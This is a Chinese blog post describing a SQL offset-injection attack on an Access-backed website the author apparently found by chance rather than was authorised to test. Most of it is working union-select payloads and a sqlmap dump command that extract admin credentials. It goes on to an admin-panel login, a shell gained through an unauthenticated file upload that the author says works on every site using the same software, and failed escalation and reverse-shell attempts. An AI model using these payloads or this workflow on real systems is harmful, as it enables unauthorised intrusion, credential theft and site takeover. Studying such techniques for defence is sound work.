记一次Access偏移注入

栏目: 编程工具 · 发布时间: 5年前

内容简介:一直想找个目标站,练习一下Access的偏移注入,今天遇见个站,用Sqlmap只能跑出来表名,好的就它了。由于列名猜解不出来(后面有猥琐思路),所以使用偏移注入

记一次Access偏移注入

一直想找个目标站,练习一下Access的偏移注入,今天遇见个站,用Sqlmap只能跑出来表名,好的就它了。

已知表名:tbladmin

偏移注入

判断字段数

order by 12

爆出显示位

union select 1,2,3,4,5,6,7,8,9,10,11,12 from tbladmin

使用偏移注入

由于列名猜解不出来(后面有猥琐思路),所以使用偏移注入

union select 1,2,3,4,5,6,7,8,9,10,11,12,* from tbladmin - 报错
union select 1,2,3,4,5,6,7,8,9,10,11,* from tbladmin - 报错
....
union select 1,2,3,4,5,6,7,8,* from tbladmin - 正常

说明了tbladmin表下有8个字段, 代表了所有字段,比如查 tbladmin 表,它有几个字段,那么 就代表几个字段

偏移注入的基本公式

order by 出来的字段数减去 * 号前的字段数,然后再用order by 出来的字段数减去2倍刚才得出来的答案

即 12-8=4 ,12-2*4=4

关于为什么要减去乘2的问题:由于这个(tbladmin as a inner join tbladmin as b on a.id=b.id)是tbladmin表自连接的,这样from 后面的表就会成为字段数加倍的表

这样就可以使 * 代表的字段拓宽,加大账号,密码在显示位出现的几率

union select 1,2,3,4,* from (tbladmin as a inner join tbladmin as b on a.id=b.id)

当前字段数已经为:4+4*2 = 12 = 12,这条语句显然是合法的

记一次Access偏移注入

现在可以看到,只出现了账号admin,我们还需要密码,所以继续打乱顺序

union select 1,2,3,4,a.id,* from (tbladmin as a inner join tbladmin as b on a.id=b.id) - 页面无变化
union select 1,2,3,4,a.id,b.id,* from (tbladmin as a inner join tbladmin as b on a.id=b.id) - admin变成1

这里有个偏移注入的核心问题

当前字段数已经为:4+2+4*2 = 14 > 12,但这条语句却依然是合法的,为什么呢?

因为 a.id 和 b.id 在 * 里是有的,所以计算机会自动去掉重复的, 保持集合里元素的唯一性,这样一来最终查询效果的一样,但是里面字段排列顺序却被打乱了,所以才造成了偏移注入的产生。

目前我们已经进行了两次打乱,但是密码还是没有偏移到可显示的位置,这时,我们就需要继续来打乱顺序

union select a.id,b.id,c.id,* from ((tbladmin as a inner join tbladmin as b on a.id=b.id) inner join tbladmin as c on a.id=c.id)

当前字段数已经为:0+4*3 = 12 = 12,所以这条语句还是合法的

记一次Access偏移注入

继续打乱

union select a.id,b.id,* from ((tbladmin as a inner join tbladmin as b on a.id=b.id) inner join tbladmin as c on a.id=c.id)

记一次Access偏移注入

union select a.id,* from ((tbladmin as a inner join tbladmin as b on a.id=b.id) inner join tbladmin as c on a.id=c.id)

记一次Access偏移注入

至此,成功完成,拿去解密发现,WTF,解不出来。。。:

记一次Access偏移注入

联合注入(猥琐)

有时候渗透的思路真是要猥琐至极才好,我沉思了几分钟之后,灵光一闪,掏出了我的御剑珍藏版,扫出了后台(为什么这里要写出来呢,感觉可以算是一种思路)

看下登陆框源码

凭借我多年老司机的经验,这个名字就有可能是列名了:

记一次Access偏移注入

直接联合查询

union select 1,admin_name,admin_pass,4,5,6,7,8,9,10,11,12 from tbladmin

记一次Access偏移注入

登陆后台+GetShell

但是现在出来依然是admin,直接在Sqlmap里面把表名,列名都指定出来,去dump看看还有没有其他账户

sqlmap.py -u url -T tbladmin -C admin_name,admin_pass --dump

记一次Access偏移注入

发现ljy账户的密码是可以解密的,成功登陆后台,找到一处任意文件上传成功getshell:

{ 顺带说一下,这个文件上传链接固定,且不需要登陆,是一个通杀,凡是使用该程序的站点,基本都可以秒下来。}

记一次Access偏移注入

这次又是个内网的机器,最近遇到的有点多,用了几个新出的exp,提权失败了,反弹msf也没成功。。。暂时放弃

记一次Access偏移注入


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

大数据技术原理与应用

大数据技术原理与应用

林子雨 / 人民邮电出版社 / 2015-8-1 / 45.00

大数据作为继云计算、物联网之后IT行业又一颠覆性的技术,备受关注。大数据处不在,包括金融、汽车、零售、餐饮、电信、能源、政务、医疗、体育、娱乐等在内的社会各行各业,都融入了大数据的印迹,大数据对人类的社会生产和生活必将产生重大而深远的影响。 大数据时代的到来,迫切需要高校及时建立大数据技术课程体系,为社会培养和输送一大批具备大数据专业素养的高级人才,满足社会对大数据人才日益旺盛的需求。本书定......一起来看看 《大数据技术原理与应用》 这本书的介绍吧!

HTML 压缩/解压工具
HTML 压缩/解压工具

在线压缩/解压 HTML 代码

随机密码生成器
随机密码生成器

多种字符组合密码

MD5 加密
MD5 加密

MD5 加密工具